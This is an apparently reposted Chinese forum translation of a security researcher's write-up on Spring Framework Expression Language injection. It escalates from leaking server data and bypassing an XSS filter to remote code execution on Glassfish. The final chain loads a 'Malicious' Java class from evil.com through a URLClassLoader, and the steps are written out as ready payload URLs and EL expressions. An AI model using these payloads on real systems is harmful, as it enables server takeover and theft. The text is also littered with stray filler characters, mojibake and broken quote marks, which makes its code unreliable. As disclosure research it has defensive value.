Remote Code with7 c( {) c5 M! u; v
Expression Language Injection
! Z( t" u$ f' u3 wSpring Framework脆弱性—DanAmodio
# t4 _! w2 ~, Z0 p; ]& `3 C) r全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
- s5 J1 P7 g ^. T) m% m/ F可能会存在风险。
" |$ R: u6 V$ u在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的% U2 N% t7 j' v4 [" z# B
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可8 S! R& a& N. p! u% L1 W5 p |9 B5 I4 x
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,9 y8 O# |) r; l: i5 F8 v6 c
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前5 i' t; x' Z8 U J
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。) }. |( L; f6 D, a7 A' T( c1 O; F
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
& t- Y1 p- `. b7 G我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版" x+ u3 _* q2 t4 z
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
1 T2 [( g1 i, l" Z& R这些版本不支持禁用double EL resolution.
1 ^+ K' ~" i4 u" O. N8 Q- m这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
- W6 R) C9 ^! ^% @EL2.2容器上可能进行远程代码执行。
& T, t' m( X; n) e这是一个原始信息泄露的攻击例子: Z. d: t) T. I0 H! K' B
请求:' B4 n2 |: D+ W3 D ~ x& p
ttp://vulnerable.com/foo?message=${applicationScope}4 {7 f$ I2 {+ B/ Z$ c! I
到达以下内容页面:
+ E4 J7 c6 `7 k9 A7 J; Y结果将输出一些包含内部服务器信息calsspath 和本地工作目录
: ]; A8 e, v8 {' u8 A/ ]$ x/ u你也可以做一些其他事情,如这样:
, @2 |* w8 ~. C7 o${9999+1}4 r Z9 a4 ]: L3 P5 d
还可以访问session 对象和beans+ L F+ o. _% v5 x( V
${employee.lastName}% I$ r/ i" J" ~1 J
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
4 l' E+ l( ~& j6 e! \4 [% @EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东5 H* y4 d# S1 i
西,比如XSS.& H0 c% K3 R- ^2 X2 j3 G) @6 l3 D" P
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签; |& {$ ~* w+ @! F% m
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
$ e& `; _ h' z' U4 g8 ^& d* p呢?”
?& L9 ]6 O; \因此,我尝试巳缦拢�7 X6 _) A0 [+ h3 ]5 E0 S
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP' U: p3 {2 E0 m3 Z$ p0 }
P3 {& \5 b6 I6 H4 S% N& |7 G: P% n
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
' e1 l' F* c% w( c5 e' e8 }/ y回的文本被插入进了spring:message 标签。+ W% o- a9 G! n. N
这里是一个最终绕过过滤的实例:# O, f; _7 N8 y2 p7 o% b, ~
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ7 C3 E( K/ ?5 r) [! e3 P' z2 F
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为5 O- `9 T8 C; M! e
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?2 B0 d+ x6 { m: Q/ j/ i
经过一番研究,我学习到EL2.2 增加了方法调用。
% Y) g+ e2 |8 Q! k' o1 y) B我写了一个快速测试应用程序代码并且检测一些功能
& K; i$ M# `! u* T${pageContext.request.getSession().setAttribute(“account”,”123456″)}& p. |) r. p$ ~! w( g6 e) n% U" `: {
${pageContext.request.getSession().setAttribute(“admin”,true)}" h! ?7 m2 `; y& A3 g
好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的; s L: W- k$ B* R! m
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?" n: _6 A: y/ W
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
9 I: L+ x8 [# u* I2 z“, 1234)}
; e' D6 L* f4 x& h4 {${“”.getClass().forName(“java.lang.Runtime”)}
3 O, _& P; I0 x/ h) S! w. d哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不
# w6 \) A! Z# ^2 H可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
5 d: o+ D3 H* H: p# {* f- P数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
7 J: e3 u7 n* D, F% S! W$ J一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
. U0 }, U" @/ n2 R3 M方法签名invoke(Object obj, Object„ args)! \9 D0 n" U1 ?* g3 v: ]) {. N# f
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
. c# u5 k0 ^+ p4 b% v0 N; X. a' k" i题,以让它可以工作起来。4 ~7 k! _' U a: D* h L: B
漏洞利用:- q. [( d7 {+ P/ U, i
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
7 I4 i, R0 A& q5 F3 i7 D- T希望你们中的一些JAVA奇才告诉我我是如此的可笑。
; c7 E, ]' b% y8 T2 I这里有一些我试过的失败的用例,为了试图让它工作的用例:2 t6 L& j+ a/ G5 @# `$ I
写文件到文件系统; Z! M0 Z" A. @( h P
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
1 F) X; m7 R8 _0 Z% b2 c3 B我认为这些可以很好的工作,但是我不能找到合适的类来载入。
! v9 @" e) ?9 t- {- R c${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
( Q* ]3 @% u" K& V: E8 m" ojavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:( d* y+ h, |) o( A
org.springframework.expression.spel.standard.SpelExpressionParser not found
, A' e/ y6 ~* V4 r5 X+ A- _5 t- ?by! I3 O! T' N, y4 Q. g2 ~
org.glassfish.web.javax.servlet.jsp [194].3 c- P% |6 {0 t: z( O, h
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public* G! z% F- ^6 V
利用反射来创建一个新的Runtime(and watch the world burn)
+ `1 t7 {5 h/ D) y4 f; n5 j${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName: t: T* [# J' D- Q; d
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
4 X+ `: h1 E0 ]# e" D) p7 W7 z1 d${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
j" Z3 O9 n( |1 t* @; D 使用java.lang.ProcessBuilder
+ k9 L& \8 s" ]8 ]$ K 用表达式语言来评估表达式语言
9 @7 f) w+ s5 }# u1 M R$ pExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
% {* u6 ?6 w o( H/ _. f${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request2 O/ ] ]# v. ?7 c! z
“,”".getClass(),null)}
9 A% T6 ?7 @6 B7 q% _ 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)* W# r* M# q4 A1 e5 [5 I. z# Q
我在使用一个空数组通过Method.invoke()时失败了很多次 h& g, S' k. }* C$ |
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo# [$ N( j& `4 @& ^ Q
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A% a/ u/ W7 ?) T! w
rrayList”).newInstance().toArray())
& A0 m$ ^* _8 C+ }, h# fjava.lang.IllegalArgumentException: wrong number of arguments% P b8 Q3 E9 s k7 ?
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
5 S1 H" ?) n) c) f" u以创建一个恶意class文件并且指向类装载器.! `6 R! d4 a7 }; k$ j9 \# w' I
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:, ]5 J" ?, U# w
public class Malicious {
& b9 H( P; p* W( ~5 s1 C9 kpublic Malicious() {
! L" N4 M* k+ i+ |; p1 Q0 Q* ~# ztry {
: g' p2 d# f) k% Ejava.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac1 m+ c; \2 [& A# U0 G
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
4 P# E P3 O8 E+ o0 b1 W} catch (Exception e) {
" ~' E! Q7 F9 D}' A* ^+ c" l3 ^1 f' B, c
}. n3 e, Q5 ]/ p4 b: q
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回! u0 K3 d) M) J& V8 o/ `' q
话中,因此它可以被使用.8 C% B9 r# s# L P8 _, G" h
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
0 ~' h Q" j9 `" V- |9 ` O3 Z(“java.util.ArrayList”).newInstance())}4 {/ ^. j$ ~' T; s6 I8 \% ?
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
7 K6 D3 ~$ {8 c! {; m' Q一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
3 |: w% S6 z8 ~& t0 i; x& V/ dgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个; u5 r% G0 h% Y
我们可以调用的create(string)方法,然后转换对一个URL对象。; O! N+ O1 N5 ^% n J) Q7 M
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
' g0 t; `3 Y5 K* T8 f! ?ere/malicious/classfile/is/located/”).toURL())}7 M$ F2 w' S& P Q( K
然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,7 K3 q# ^4 P( d1 e
恶意类文件被装载并创建,触发远程代码.7 v( G2 P4 j1 T, R$ l
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte R8 W$ s6 B1 L: ]+ | ~1 `- E+ {
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
b+ u& j& t3 i+ k- V9 cgetClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance. Q, P2 w# D3 S6 \: U7 l
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对